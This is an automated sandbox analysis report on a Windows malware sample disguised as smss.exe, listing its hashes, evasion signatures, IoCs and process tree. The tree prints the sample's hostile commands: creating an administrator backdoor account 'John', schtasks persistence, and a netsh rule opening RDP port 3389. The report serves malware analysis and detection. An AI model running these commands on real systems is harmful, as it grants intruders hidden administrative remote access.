Analysis
  max time kernel: 596s
  max time network: 600s
  platform: windows10-2004_x64
  resource: win10v2004-20240412-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 26-04-2024 13:52

General
  Target: smss.exe
  Size: 9.2MB
  MD5: 53b92442e012db2fc2ee7dc22ee932a9
  SHA1: 750d3f0ac227ccaa2c2a86859cffa4a2ac7cb1d1
  SHA256: 776217117d4b2ecdb07b8a182581e4fd562c0a5785340f86100cf5c1b4eff62e
  SHA512: b64301d65f48f76855ad89723a933f6e25478ae3a5bcc35cbef81badd08d6dc565d41b51b46a9ab1ad750f0dfa81bffc3c4e6b3b5708f49fd937c948d674c430
  SSDEEP: 196608:uDL2f4ARa+Yw//FpKv45ZhxE5ckWxoUPTYC39SGVy32idMfeaq6p:2L2f4ARaat64fhuWxjBE2SMfeaq6p
Malware Config
Signatures

Grants admin privileges 1 TTPs
  Uses net.exe to modify the user's privileges.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | smss.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs
  pid | Process
  5564 | netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs
  description | ioc | Process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | RDPWinst.exe

Checks BIOS information in registry 2 TTPs 2 IoCs
  BIOS information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | smss.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | smss.exe

Checks computer location settings 2 TTPs 13 IoCs
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | AutoIt-Extractor-net40-x64.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | smss.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation | winserv.exe

Executes dropped EXE 15 IoCs
  pid | Process
  3640 | winserv.exe
  4776 | winserv.exe
  5192 | RDPWinst.exe
  5648 | winserv.exe
  5540 | winserv.exe
  3164 | AutoIt-Extractor-net40-x64.exe
  2008 | aut62312.exe
  4620 | winserv.exe
  6136 | winserv.exe
  5196 | winserv.exe
  624 | winserv.exe
  3920 | winserv.exe
  4144 | winserv.exe
  5080 | winserv.exe
  732 | winserv.exe

Loads dropped DLL 1 IoCs
  pid | Process
  808 | svchost.exe

  resource | yara_rule
  behavioral1/memory/4528-0-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-3-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-2-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-4-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-5-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-8-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-7-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-9-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-6-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-67-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-311-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/memory/4528-392-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | themida
  behavioral1/files/0x0009000000023524-620.dat | themida

Checks whether UAC is enabled
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | smss.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  flow | ioc
  91 | raw.githubusercontent.com
  87 | raw.githubusercontent.com
  88 | raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  100 | ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWinst.exe

AutoIT Executable 11 IoCs
  AutoIT scripts compiled to PE executables.
  resource | yara_rule
  behavioral1/memory/4528-3-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-4-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-5-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-8-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-7-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-9-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-6-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-67-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-311-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/memory/4528-392-0x00007FF6AF8D0000-0x00007FF6B0868000-memory.dmp | autoit_exe
  behavioral1/files/0x0009000000023524-620.dat | autoit_exe

Drops file in System32 directory 1 IoCs
  description | ioc | Process
  File created | C:\Windows\System32\rfxvmt.dll | RDPWinst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  pid | Process
  4528 | smss.exe

Drops file in Program Files directory 5 IoCs
  description | ioc | Process
  File opened for modification | C:\Program Files\RDP Wrapper | smss.exe
  File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | smss.exe
  File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWinst.exe
  File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWinst.exe
  File opened for modification | \??\c:\program files\rdp wrapper\rdpwrap.txt | svchost.exe

Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry 2 TTPs 2 IoCs
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | smss.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | smss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  1832 | schtasks.exe
  2384 | schtasks.exe

Delays execution with timeout.exe 1 IoCs
  pid | Process
  2644 | timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe

Modifies registry class 64 IoCs

NTFS ADS 3 IoCs
  description | ioc | Process
  File opened for modification | C:\ProgramData\Setup\winmgmts:\ | smss.exe
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 211157.crdownload:SmartScreen | msedge.exe
  File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 538827.crdownload:SmartScreen | msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs
  pid | Process
  5336 | NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Suspicious behavior: LoadsDriver 1 IoCs
  pid | Process
  660 | Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs

Suspicious use of AdjustPrivilegeToken 6 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 3640 | winserv.exe
  Token: SeTakeOwnershipPrivilege | 4776 | winserv.exe
  Token: SeTcbPrivilege | 4776 | winserv.exe
  Token: SeTcbPrivilege | 4776 | winserv.exe
  Token: SeDebugPrivilege | 5192 | RDPWinst.exe
  Token: SeAuditPrivilege | 808 | svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 48 IoCs
Suspicious use of SetWindowsHookEx 56 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented entries are child processes of the entry above them)

C:\Users\Admin\AppData\Local\Temp\smss.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\smss.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 4528

    C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
      - Creates scheduled task(s)
      PID: 1832

    C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
      - Creates scheduled task(s)
      PID: 2384

    C:\ProgramData\Windows Tasks Service\winserv.exe
      Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      PID: 3640

        C:\ProgramData\Windows Tasks Service\winserv.exe
          Command line: "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          PID: 4776

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net user John 12345 /add
      PID: 5132

        C:\Windows\system32\net.exe
          Command line: net user John 12345 /add
          PID: 5192

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 user John 12345 /add
              PID: 5208

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
      PID: 5228

        C:\Windows\system32\net.exe
          Command line: net localgroup "Администраторы" John /add
          PID: 5304

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Администраторы" John /add
              PID: 5328

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
      PID: 5356

        C:\Windows\system32\net.exe
          Command line: net localgroup "Пользователи удаленного рабочего стола" John /add
          PID: 5440

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
              PID: 5460

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
      PID: 5480

        C:\Windows\system32\net.exe
          Command line: net localgroup "Пользователи удаленного управления" john /add" John /add
          PID: 5544

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
              PID: 5560

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
      PID: 5588

        C:\Windows\system32\net.exe
          Command line: net localgroup "Administrators" John /add
          PID: 5668

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Administrators" John /add
              PID: 5688

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
      PID: 5704

        C:\Windows\system32\net.exe
          Command line: net localgroup "Administradores" John /add
          PID: 5756

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Administradores" John /add
              PID: 5772

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
      PID: 5788

        C:\Windows\system32\net.exe
          Command line: net localgroup "Remote Desktop Users" john /add
          PID: 5840

            C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
              PID: 5856

    C:\ProgramData\RDPWinst.exe
      Command line: C:\ProgramData\RDPWinst.exe -i
      - Sets DLL path for service in the registry
      - Executes dropped EXE
      - Modifies WinLogon
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of AdjustPrivilegeToken
      PID: 5192

        C:\Windows\SYSTEM32\netsh.exe
          Command line: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
          - Modifies Windows Firewall
          PID: 5564

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      PID: 5140

        C:\Windows\system32\timeout.exe
          Command line: timeout 5
          - Delays execution with timeout.exe
          PID: 2644
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 4200

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff81d7c46f8,0x7ff81d7c4708,0x7ff81d7c4718
      PID: 5088

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
      PID: 3008

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID: 4176

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
      PID: 4864

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
      PID: 1532

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
      PID: 2312

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
      PID: 3524

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
      PID: 3416

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
      PID: 5348

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
      PID: 5880

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
      PID: 6080

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
      PID: 5520

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
      PID: 5780

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
      PID: 5748

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3548 /prefetch:8
      PID: 6064

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5468 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      PID: 3032

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
      PID: 5400

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
      PID: 5760

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
      PID: 5620

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
      PID: 2972

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
      PID: 4656

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5592 /prefetch:8
      PID: 1188

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1
      PID: 5608

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6528 /prefetch:8
      PID: 1792

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:8
      PID: 5372

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:1
      PID: 4824

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2260 /prefetch:1
      PID: 5460

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
      PID: 4256

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
      PID: 5784

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
